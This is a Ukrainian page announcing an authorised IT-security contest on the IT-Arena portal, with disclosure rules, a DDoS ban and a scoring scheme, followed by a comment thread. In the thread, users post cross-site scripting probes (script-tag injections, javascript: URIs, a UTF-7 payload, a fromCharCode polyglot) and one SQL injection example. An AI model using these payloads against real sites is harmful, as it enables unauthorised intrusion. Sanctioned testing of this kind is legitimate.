Постійно-діючий конкурс з IT-безпеки
Рівень змагання:
2
Термін проведения:
від 2012-09-30 21:00
до  2013-12-30 22:00
Вікова категорія:
Від 5 до 30

Оголошуємо відкриття постійно-діючого конкурсу з IT-Безпеки на порталі IT-Арена.

УМОВИ:

1. Предметом конкурсу є виявлення "дір", зон уражень у веб-додатках та лікування виявлених вразливостей.
2. Об'єктом конкурсу є перелік ресурсів які надали згоду на участь у конкурсі та перевірку своєї системи безпеки на нижченаведених умовах. На даний момент у конкурсі бере участь 1 ресурс, а саме IT-Арена

  www.it-arena.org  

3. Результати виявлення уражень на інших ресурсах, окрім вказаних у пункті 2, у конкурсі не розглядається.
4. Щоб додати свій інтернет-ресурс до конкурсу, власники інтернет-ресурс
у повинні надіслати запит на info@it-arena.org
5. Суддя конкурсу - Адміністратор порталу IT- Арена.

ПРАВИЛА КОНКУРСУ

1. Будь-які дії у контексті даного конкурсу не повинні призводити до порушення основного змагального процесу порталу. Якщо усе ж таки діяльність ресурсу була порушена, необхідно якомога швидше зв'язатися з Адміністрацією ресурсу та усіляко сприяти якомога швидшому відновленню роботоздатності.

2. Усі дії конкурсу з IT-безпеки проводити у вільний від змагань час. Під час змагань необхідно зберігати режим "тиші".  Якщо необхідно перевірити зони потенційного ураження під час конкурсу - ні в якому разі такі дії не повинні спричинити до втрати або модифікації реальних проектів учасників конкурсу.

3. У процесі конкурсу учасник вільний використовувати усі свої знання та технології, окрім DDOS-атак.

4. Після виявлення ураження, учасник зобов’язаний зафіксувати його та відправити звіт з покроковою інструкцією Адміністратору на emailinfo@it-arena.org ). Адміністратор розглядає наданий звіт та, у випадку підтвердження «проблеми», класифікує його відповідно до рівня ураження. Після «лікування», Адміністратор, відповідно до рівня Ураження, нараховує бали учаснику та публікує його статтю.

5. Класифікація рівнів ураження веб-систем:

Ураження 1 рівня: отримання Адміністративного доступу, маніпуляції з файлами на сервері або отримання адмін-доступу до бази даних, тощо.
Винагорода:

20 IT-балів;
                публікація статт
і учасника з описом ураження на порталі IT-Арена;

Ураження 2 рівня: маніпуляції з даними, які впливають на основний процесс проведення конкурсів ( отримання іще неопублікованих результатів або завдань конкурсів, модифікація оцінок суддів, маніпуляції з IT-балами, тощо). Винагорода:

10 IT-балів
                публікація статт
і учасника з описом ураження на порталі IT-Арена;

Ураження 3 рівня: маніпуляція даними, що не впливають на основний процесс змагання (коментарі, статті, тощо). Винагорода

5 IT-балів
публікація статт
і учасника з описом ураження на порталі IT-Арена;

ЗАБОРОНЕНО

6. ЗАБОРОНЕНО проводити DDOS-атаки. Портал розміщений на сервері з іншими важливими сайтами і DDOS-атака може негативно вплинути на роботу сервера загалом.
7. ЗАБОРОНЕНО розголошувати виявлені "проблеми" до отримання підтвердження Адміністратора щодо їх виправлення.
8. ЗАБОРОНЕНО афішувати перемоги у будь-якому вигляді окрім публікації статті на порталі IT-Арена у вигляді статті.
9. ЗАБОРОНЕНО замовчувати виявлені ураження та будь-яке їх використання з корисними цілями (маніпуляції з IT-балами, призами, рейтингом тощо)

ВІДПОВІДАЛЬНІСТЬ

10. Порушення правил конкурсу або нехтування заборон трактується як навмисне учинення шкоди. У цьому випадку Адміністрація застосовує усі доступні ресурси та залучає компетентні та уповноважені органи для притягнення порушника до відповідальності у відповідності з чинним Карним Кодексом та Міжнародними конвенціями щодо забезпечення Інформаційної безпеки.

 

Номінація: IT-безпека


роботи
Робота 1 етап Статус Технологія IT-бали
Номінація IT-безпека, поза віковими категоріями
1 XSS через URL на порталі IT-Арена
Загарія Олександр ( )
Ураження 1 рівня XSS  20

НОВА СТАТТЯ
2012-10-01 Автор: 1
 
ОБГОВОРЕННЯ:
2012-10-02 14:53 Юрий Скатаренко :
alert()
2012-10-02 14:53 Юрий Скатаренко :
теги удаляются))
2012-10-16 12:00 Іван Безсмертний:
``;!--"=&{()}
2012-10-16 12:25 Іван Безсмертний:
alert(1) alert(2) alert(3) alert(4) alert(5)
2012-10-16 12:28 Іван Безсмертний:
">`"`,/?@%
2012-10-16 12:31 Іван Безсмертний:
>>>>
2012-10-16 12:31 Іван Безсмертний:
script
2012-10-16 13:08 Іван Безсмертний:
",>`< ",
2012-10-16 13:10 Іван Безсмертний:
",>`alert(1);`"",>`
2012-10-16 13:12 Іван Безсмертний:
",>`И тут работает!
2012-10-16 13:13 Іван Безсмертний:
",>`
2012-10-16 13:14 nezumi derzkiy:
alert(`nezumi.tested`)
2012-10-23 11:02 Владислав Урсул:
)))))
2012-11-13 21:32 Іван Литвиненко:
[img]j a v a s c r i p t:alert(/XSS/).jpg[/img]
2012-11-13 21:32 Іван Литвиненко:
j a v a s c r i p t:alert(`XSS`)
2012-11-13 21:44 Іван Литвиненко:
[post=1000[topic=wj (javascript*:alert (`s *1;&#*49;`)]] [/topic] [/post]
2012-11-13 21:50 Іван Литвиненко:
ну!
2012-11-13 21:51 Іван Литвиненко:
ага.....)
2012-11-13 21:55 Іван Литвиненко:
execScript({},{})
2012-11-13 22:20 Іван Литвиненко:
IMG SRC="jav ascript:alert(`XSS`);">
2012-11-13 22:24 Іван Литвиненко:
a="get"; b="URL(""; c="javascript:"; d="alert(`XSS`);")"; eval(a+b+c+d);
2012-11-13 22:46 Іван Литвиненко:
alert(`Добрый день`)
2012-11-13 22:47 Іван Литвиненко:
<script language = Javascript> alert(`Добрый день`) </script>
2012-11-13 22:48 Іван Литвиненко:
<script language = Javascript> alert(`Добрый день`) < \ script>
2012-11-16 23:12 Дмитро Кутрань:
include();
2012-11-29 18:50 Микита Меленчуков:
/alert(`heel`);
2012-11-30 18:03 Вячеслав Мен:
alert(`Приветшрыиршиа`)
2012-12-07 22:36 Іван Безсмертний:
+ADw-SCRIPT+AD4-alert(`message`);+ADw-/SCRIPT+AD4-
2012-12-07 22:46 Іван Безсмертний:
`>">alert(/XSS4/)
2012-12-07 23:19 Адміністратор:
Безкінечно можна дивитися на воду, вогонь та те, як працюють інші. :)
2012-12-07 23:25 Іван Безсмертний:
ну все ж таки якщо дуже сильно захотіти то можна написати код який не відфільтруєця) але це надоїдає))
2012-12-07 23:30 Адміністратор:
Іване - я знаю, що дірок іще багато, навіть відомо де. Та за півроку самі очевидні дірки себе вже проявили, а для більш серйозних поки що не вистачає у учасників фантазії або навичок. Але, час від часу з`являються товариші, коли приходиться сідати та штопати - відновлювати - штопати - відновлювати ... :).
2012-12-08 15:32 Іван Безсмертний:
та це ще й треба мати бажання їх шукати)) опублікували би якісь нові статті вже чи що) а то якось не цікаво
2012-12-08 16:36 Іван Безсмертний:
`;alert(String.fromCharCode(88,83,83))//`;alert(String.fromCharCode(88,83,83))//"; alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-- >">`>alert(String.fromCharCode(88,83,83))
2013-02-20 16:14 Валерій Кандірал:
Click me!
2013-03-28 13:54 Владислав Соломаха:
$search = $_GET["search"]; "SELECT * FROM base WHERE text LIKE (`%$search_text%`) Для /?search=abc все отлично, но если наберут например /?search=`)+and+(id=`1 получаем запрос "SELECT * FROM base WHERE text LIKE(`%`) AND (id=`1%`)"
2013-04-05 09:16 Олексій Пількевич:
Test
2013-04-05 09:16 Олексій Пількевич:
Test
2013-11-19 17:06 Max Fedotov:
Fef
2013-11-19 17:06 Max Fedotov:
body{ }
2013-11-19 17:07 Max Fedotov:
body{ background-color:#c1c1c1; }
2013-11-19 17:07 Max Fedotov:
hhm...
2013-11-19 19:07 Дмитро Пустовий:
javascript:void(document.body.contentEditable = true);